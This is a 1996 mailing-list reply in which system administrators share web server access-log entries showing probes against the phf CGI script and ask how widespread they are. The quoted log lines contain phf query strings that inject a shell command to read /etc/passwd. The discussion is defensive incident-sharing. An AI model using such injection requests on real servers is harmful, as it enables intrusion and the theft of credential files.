On Wed, 10 Jul 1996 meowmyx @
morebbs .
com wrote:
>
> I was browsing through the system files of a web server that sits outside a
> firewall There were a couple of interesting entries in the access log
>
> 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
> 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
We got a lot of these too:
access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET
/cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 -
Not original but they tried--looks like an automated script judging from
the similarities of the log entries.
In any case does anyone else have any experiences with this? I know the
problem and all, I'm just trying to get an idea of how widespread this is.
Ben.
____
Ben Samman .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
samman @
cs .
yale .
edu
Donnez-moi une bonne erreur fructueuse chaque fois, pleine de semences,
debordante de ses corrections. Vous pouvez garder votre verite sterile a
vous. - Vilfredo Pareto
Follow-Ups:
References:
|
|
